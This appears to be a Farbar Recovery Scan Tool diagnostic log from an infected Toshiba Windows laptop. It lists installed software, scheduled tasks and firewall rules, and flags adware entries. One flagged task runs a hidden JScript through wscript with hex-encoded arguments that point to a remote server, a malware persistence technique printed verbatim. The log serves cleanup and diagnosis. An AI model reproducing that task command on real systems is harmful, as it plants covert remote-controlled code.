I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Inbox Toolbar (HKLM-x32\...\{612AD33D-9824-4E87-8396-92374E91C4BB}_is1) (Version: 2.0.1.89 - Inbox.com, Inc.)
InboxAce Internet Explorer Toolbar (HKLM-x32\...\InboxAce_1gbar Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION
Intel PROSet Wireless (HKLM-x32\...\ProInst) (Version: - ) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2430 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{3C41721F-AF0F-4086-AA1C-4C7F29076228}) (Version: 14.01.1000 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)
Intel® WiDi (HKLM-x32\...\{781A93CD-1608-427D-B7F0-D05C07795B25}) (Version: 2.1.41.0 - Intel Corporation)
Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - )
Java™ 6 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216025FF}) (Version: 6.0.250 - Oracle)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.57.2 - JMicron Technology Corp.)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Label@Once 1.0 (HKLM-x32\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
McAfee AntiVirus Plus (HKLM-x32\...\MSC) (Version: 12.8.958 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.235 - McAfee, Inc.)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickBooks (HKLM-x32\...\{9A2F0810-369F-4E86-9072-973FBE1679C5}) (Version: 19.0.4014.705 - Intuit Inc.) Hidden
QuickBooks Pro 2009 (HKLM-x32\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4014.705 - Intuit Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.38.113.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6305 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.34.0 - Renesas Electronics Corporation) Hidden
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.34.0 - Renesas Electronics Corporation)
Search Provided by Yahoo (HKLM-x32\...\YahooProvidedSearch) (Version: - ) <==== ATTENTION
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1264 - SUPERAntiSpyware.com)
SupportSoft Assisted Service (HKLM-x32\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.2.11.1 - Synaptics Incorporated)
Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.2 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}) (Version: 4.2.3.0 - TOSHIBA CORPORATION)
Toshiba Book Place (HKLM-x32\...\{A14962A7-2B7D-456E-BFCD-F54E3A88D41F}) (Version: 2.2.7530 - K-NFB Reading Technology, Inc.)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.11 for x64 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}) (Version: 1.3.5.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.17.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.12C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.1.37C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.2.15 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.9 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.13.11 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.4 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.7.5 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 2.0.0.31 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.7.9.64 - TOSHIBA Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.3 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.5.5109a - TOSHIBA CORPORATION)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}) (Version: 1.7.21.64 - TOSHIBA Corporation)
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.1.2001 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.12 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.2.8 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.51.2C - TOSHIBA CORPORATION)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.6.1.64 - TOSHIBA Corporation)
TOSHIBA VIDEO PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 4.00.7.06-A - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}) (Version: 2.0.3.3 - TOSHIBA Corporation)
TOSHIBA Wireless Display Monitor (HKLM-x32\...\{617773AE-ADBA-4479-BB04-65FE7758B35C}) (Version: 1.0.1 - TOSHIBA CORPORATION)
TOSHIBA Wireless LAN Indicator (HKLM-x32\...\{5B01BCB7-A5D3-476F-AF11-E515BA206591}) (Version: 1.0.5 - TOSHIBA CORPORATION)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.6 - TOSHIBA)
UpdateAdmin (HKLM-x32\...\{07B4B423-E4DA-47D1-8327-B589EB4BEB58}) (Version: 2.0.1885 - DownloadAdmin) <==== ATTENTION
Utility Common Driver (HKLM-x32\...\{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}) (Version: 1.0.52.3C - TOSHIBA) Hidden
Utility Common Driver (HKLM-x32\...\InstallShield_{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}) (Version: 1.0.52.3C - TOSHIBA) Hidden
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
XFINITY Toolbar (HKLM-x32\...\xfin_portal) (Version: 4.1.0.14 - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000_Classes\CLSID\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}\InprocServer32 -> C:\Program Files (x86)\AppGraffiti\AppGraffiti64.dll (Omega Partners Ltd)
CustomCLSID: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000_Classes\CLSID\{CC99A798-FD3D-4AB4-969E-6071612524F9}\InprocServer32 -> C:\Program Files (x86)\AppGraffiti\AppGraffiti64.dll (Omega Partners Ltd)
CustomCLSID: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000_Classes\CLSID\{D4AB823B-3EBC-477B-AA5B-D7061C9E83B0}\InprocServer32 -> C:\PROGRA~2\REBATE~1\RebInf64.dll => No File
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2014-04-25] (McAfee, Inc.)
ContextMenuHandlers1: [OVShellMenu64] -> {CB19FE72-951B-4ff1-9499-CB02344D9B2F} => -> No File
ContextMenuHandlers4: [OVShellMenu64] -> {CB19FE72-951B-4ff1-9499-CB02344D9B2F} => -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\windows\system32\igfxpph.dll [2011-06-27] (Intel Corporation)
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2014-04-25] (McAfee, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0AF368F5-9670-4D83-97C8-E2B19293E7D1} - System32\Tasks\GeniusBox => cmd.exe /C start "" "C:\Program Files (x86)\user extensions\client.exe" <==== ATTENTION
Task: {1B9AD8FF-E950-4AB2-A182-C2D1AF3E9BB3} - System32\Tasks\UpdateAdmin => C:\Users\1108\AppData\Local\UpdateAdmin\UpdateAdmin.exe <==== ATTENTION
Task: {248DC973-88FD-449A-AAE7-A2410A3B849A} - System32\Tasks\TOSHIBA Wireless Display Monitor => C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe [2010-12-25] (TOSHIBA CORPORATION)
Task: {3615CE76-E568-48AA-BF7F-2BB68BED9F0B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {40E113EE-9062-4A43-AFF3-95B601D61785} - System32\Tasks\Check Updates => Command(1): C:\Program Files (x86)\user extensions\updater.exe [2015-07-22] ()
Task: {40E113EE-9062-4A43-AFF3-95B601D61785} - System32\Tasks\Check Updates => Command(2): C:\Program Files (x86)\user extensions\tasks.exe [2015-07-22] ()
Task: {420D4405-DCDD-466F-9085-F2D399CC6660} - System32\Tasks\HPCustParticipation HP Officejet Pro 8600 => C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {8C2E8C54-4F96-41C3-9B3C-7C1584718A9D} - System32\Tasks\Tny_cassiopesa => C:\Users\1108\AppData\Roaming\TNY_CA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {A3B0C0D8-36F2-49FE-A37A-8DAEEEFD9BF8} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\windows\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_Plugin.exe [2018-10-13] (Adobe Systems Incorporated)
Task: {A8FBAEB4-5E94-4067-85E6-DD91A00E4728} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {B70CFA89-D04D-434A-8790-D1E15EF20B62} - System32\Tasks\Optimum_Daily => C:\Program Files (x86)\Optimum PC Boost\OptimumPCBoost.exe <==== ATTENTION
Task: {B8295DAA-32CF-4FFB-B7CF-E24C0336EC07} - System32\Tasks\{22305F83-689A-FD16-B604-7E25B458AD0C} => C:\Users\1108\AppData\Local\{15762~1\UNINST~1.EXE [2013-04-17] () <==== ATTENTION
Task: {CAEE3503-1B27-434E-8AE1-BD9B4FA52DCA} - System32\Tasks\Cassiopesa feco => "wscript.exe" "C:\ProgramData\{E7490F8A-B7CB-DE0C-064D-AE8ED6CF7D00}\2.0.1.9\dofa.txt" "433a2f50726f6772616d446174612f7b45373439304638412d423743422d444530432d303634442d4145384544364346374430307d2f322e302e312e392f6665636f2e646c6c" "687474703a2f2f73616f2e63737062696e742e636f6d2f" "--IsErIk" "//B" "//E:jscript" <==== ATTENTION
Task: {CF44C27E-F8BF-474B-AD05-D72E35D577ED} - System32\Tasks\Validate Installation => Command(1): C:\Program Files (x86)\user extensions\updater.exe -> /ValidateInstall=true
Task: {CF44C27E-F8BF-474B-AD05-D72E35D577ED} - System32\Tasks\Validate Installation => Command(2): C:\Program Files (x86)\user extensions\uninstall.exe -> /ValidateInstall=true
Task: {EB5253F4-D981-46B8-9540-4013FE8E9805} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {EC1F1A03-7885-41CC-A0BB-D1CE79E1AAF5} - System32\Tasks\Optimum_LogOn => C:\Program Files (x86)\Optimum PC Boost\OptimumPCBoost.exe <==== ATTENTION
Task: {EFF21A81-E8E4-4965-9157-B990FBDF2722} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-13] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\windows\Tasks\Tny_cassiopesa.job => C:\Users\1108\AppData\Roaming\TNY_CA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\windows\Tasks\{22305F83-689A-FD16-B604-7E25B458AD0C}.job => C:\Users\1108\AppData\Local\{15762~1\UNINST~1.EXE <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-05-31 17:32 - 2011-05-31 17:32 - 001501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2015-07-04 09:24 - 2015-07-22 17:15 - 000076800 _____ () C:\Program Files (x86)\user extensions\Client.exe
2011-06-27 09:16 - 2011-06-27 09:16 - 000094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-11-18 17:18 - 2010-11-18 17:18 - 011190784 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2010-11-30 10:37 - 2010-11-30 10:37 - 000048504 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-12-15 15:19 - 2010-12-15 15:19 - 000124320 _____ () C:\Program Files\TOSHIBA\TECO\MUIHelp.dll
2011-02-22 19:22 - 2011-02-22 19:22 - 000429432 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe
2011-06-09 21:09 - 2011-06-09 21:09 - 000079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 000000824 _____ C:\windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\1108\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{786A6EA3-2998-46E1-9C17-754BACE2B919}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{25C141B5-0353-4504-AD25-B9AC47417D53}] => (Allow) LPort=2869
FirewallRules: [{DE875970-57CD-4355-9265-E4E3972547BC}] => (Allow) LPort=1900
FirewallRules: [{877BA8D0-36EE-46E2-8CBD-CDF6437CC5DB}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{DAB74191-A3DA-47DC-80C8-6C53FA08EC39}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{F338076A-E2CF-46C2-AC58-9769849981C4}] => (Allow) C:\Program Files (x86)\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{FA1DAF1E-C5D3-4BD8-BA04-4CEEDB123AF2}] => (Allow) C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
FirewallRules: [{7451C435-CA16-49C4-BDA1-58CD034D3372}] => (Allow) C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
FirewallRules: [{1F6E9653-3A83-41EB-8A9D-8E51E3E77E1C}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E431E00D-5AB1-4AAB-B4F1-F0F1B2848774}] => (Allow) C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
FirewallRules: [{1360FA93-E22B-4529-B07D-A8DB41109B6E}] => (Allow) C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
FirewallRules: [{2D4BBF45-B827-4BFF-92F2-63FD42022892}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\FaxApplications.exe
FirewallRules: [{2F5B9D57-50A3-4984-89EA-A1F09AD15540}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\DigitalWizards.exe
FirewallRules: [{B4D69894-1CCB-4221-95C7-CF77A221C12A}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\SendAFax.exe
FirewallRules: [{97736A1F-7D80-43E0-BF77-149B2E5A3598}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\DeviceSetup.exe
FirewallRules: [{D3FE7355-7AE3-40E9-9D5F-6EF9D07AF069}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe
FirewallRules: [{35D59BA9-5733-4D4E-9B22-FA3602DA5466}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{ED813C02-BA6C-4F3C-80BE-AF357ACD8D0B}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{EC6A4C40-7318-4054-B007-70682E9E9E47}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{D38AB22C-3080-4A97-8323-F98C764DCFB8}] => (Allow) C:\Program Files (x86)\xfin_portal\dtuser.exe
FirewallRules: [{75DA56DE-9A0A-46E2-B6BA-244740A2FCD5}] => (Allow) C:\Program Files (x86)\xfin_portal\dtuser.exe
FirewallRules: [{93F79DE4-BE91-450F-8E9A-47470C0A4DE1}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{EB5BD812-5AF7-4895-AE3A-A103B911E07D}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{FE41DE3A-6F3D-44AA-8226-95281A3AA282}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{EB60A9CD-CFEF-42FA-ABBE-0280DAF696ED}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{5F834FFC-D2A1-4FE4-8EAA-61C2D5A68FD8}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{D60AA65B-FABF-440A-88CD-F155FF13ED51}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{049B0558-3BAA-47D2-AEFB-1BB7FC4A4F5B}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{96167CF8-ECD6-4C5C-94DC-D457A4F107DD}] => (Allow) C:\Users\1108\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{D3F9F5D0-B9AB-4A45-84A0-EFC4786EEA44}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5A0A4215-6165-4385-954E-58E9FD3A39AF}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{3D21529B-7E0C-46DD-AED6-5371A754A0B2}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{BC796BEF-A7D3-41DC-B141-059FF8A6D5D7}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{A13D2281-A484-4EA8-8224-B479811059A6}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{3D5D1199-7A04-47F3-866B-6E0BB703C295}] => (Allow) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe
FirewallRules: [{A354CEB3-E625-4DCD-8FF1-38155DEB5F25}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{51B38492-34CD-4A4D-9589-3983F9032BA5}] => (Allow) C:\Users\1108\AppData\Local\Temp\7zS0E62\HPDiagnosticCoreUI.exe
FirewallRules: [{24A33AD9-16C2-4C64-9C84-899633211FA1}] => (Allow) C:\Users\1108\AppData\Local\Temp\7zS0E62\HPDiagnosticCoreUI.exe

==================== Restore Points =========================

05-02-2016 23:01:17 Scheduled Checkpoint
14-02-2016 20:41:48 Windows Update
08-03-2016 22:03:52 Windows Update
18-04-2016 18:48:23 Windows Update
25-04-2016 19:57:39 Windows Update
23-05-2016 20:23:00 Windows Update
26-07-2016 21:02:14 Windows Update
30-07-2016 22:33:44 Windows Update
31-07-2016 17:54:36 Windows Update
03-12-2016 23:19:55 Windows Update
06-12-2016 18:27:28 Windows Update
16-10-2018 14:37:50 Speed Cleaner

==================== Faulty Device Manager Devices =============

Name: AntiLog32
Description: AntiLog32
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: AntiLog32
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

==================== Event log errors: =========================

Application errors:
==================
Error: (10/31/2018 05:08:52 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
